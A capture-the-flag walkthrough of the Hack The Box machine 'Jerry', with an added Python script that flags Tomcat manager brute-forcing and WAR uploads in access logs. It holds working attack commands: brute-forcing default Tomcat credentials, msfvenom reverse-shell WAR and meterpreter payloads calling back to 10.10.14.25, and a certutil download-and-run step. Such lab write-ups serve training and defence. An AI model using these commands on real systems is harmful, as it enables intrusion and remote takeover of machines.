
# Jerry HTB

## Enumeration

* We use nmap for enumeration: ![](/files/hleL0MwMACLI414GG4FU)
* We find a default web page (Apache Tomcat): ![](/files/GCyyRmDQTtL2cUMZjMwg)

## Exploitation

* Using Burp Suite we find that the password is Base64 encoded.
* We can use Decoder to decode the Base64 and we find that it is in a username:password format: ![](/files/t8VIHrzlr9SQAfXMNrC2)
* To do brute forcing we need to convert to Base64: ![](/files/wIfzhT39CNXJlw6Iw02t)
* To do this for all passwords we need a bash command, `for cred in $(cat tomcat_passwds.txt); do echo -n "$cred" | base64; done`, where `tomcat_passwds.txt` has all default passwords.
* Use Burp Suite to brute-force: ![](/files/zZSfLyt5iMb5JWBjRD7s)![](/files/LzSd3HWvKyNK8dRhzkZX)
* We found 2 matches: ![](/files/d4Cuu7IZedtr016UgxMy)
* These are the passwords required:![](/files/2N9uwopSUVy1bM3V9O8g)
* We create a msfvenom payload with `msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.25 LPORT=4444 -f war > reverse.war`, then deploy it using the previously found credentials. ![](/files/dz49rziscdrErMhLhpkT)
* Listening on netcat using `nc -nlvp 4444` we get a root shell: ![](/files/nxOnFHYkJIc7n2G3nrKP)
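
From the defender's side, the sequence above (repeated Basic-auth attempts against the Tomcat manager, a successful login, then a WAR deployment) shows up in the access log. The following is an added example, not part of the original walkthrough, that flags it; the log lines are constructed, and it assumes Tomcat's `common` access-log pattern and the HTML manager's `/manager/html/upload` deploy path.

```python
import re
from collections import defaultdict

# Constructed sample lines in Tomcat's "common" access-log pattern
# (%h %l %u %t "%r" %s %b); addresses, users and timestamps are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [30/Jan/2024:17:01:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.0.2.10 - - [30/Jan/2024:17:01:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.0.2.10 - - [30/Jan/2024:17:01:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.0.2.10 - tomcat [30/Jan/2024:17:01:03 +0000] "GET /manager/html HTTP/1.1" 200 19433
192.0.2.10 - tomcat [30/Jan/2024:17:02:40 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 200 20111
198.51.100.7 - - [30/Jan/2024:17:05:00 +0000] "GET /manager/html HTTP/1.1" 401 2473
198.51.100.7 - admin [30/Jan/2024:17:05:09 +0000] "GET /manager/html HTTP/1.1" 200 19433
"""

# host, remote user, method, path (with query string), status
LINE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def analyze(log_text, fail_threshold=3):
    """Return {ip: finding} for manager-app credential guessing and WAR uploads."""
    fails = defaultdict(int)
    findings = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, user, method, path, status = m.groups()
        if not path.startswith("/manager/"):
            continue
        if status == "401":
            fails[ip] += 1
        elif status == "200" and fails[ip] >= fail_threshold:
            # Success after repeated failures: credentials were likely guessed.
            findings.setdefault(
                ip, {"user": user, "failures": fails[ip], "war_upload": False})
        # A deploy request from an already-flagged source raises the severity.
        if method == "POST" and path.startswith("/manager/html/upload") and ip in findings:
            findings[ip]["war_upload"] = True
    return findings

if __name__ == "__main__":
    for ip, finding in analyze(SAMPLE_LOG).items():
        print(ip, finding)
```

A single mistyped password followed by a login, as from `198.51.100.7` in the sample, stays below the default threshold and is not flagged.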

### Metasploit

* Use `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.25 LPORT=4444 -f exe > meterpreter.exe` to create the payload.
* Listen using `exploit/multi/handler`.
* To upload the payload, host an HTTP server with `python -m SimpleHTTPServer 80`, then use `certutil -urlcache -f http://10.10.14.25/Downloads/Jerry/meterpreter.exe c:\users\administrator\desktop\flags\meterpreter.exe` in the shell and execute the `meterpreter.exe` file.
* Then we get a meterpreter shell.
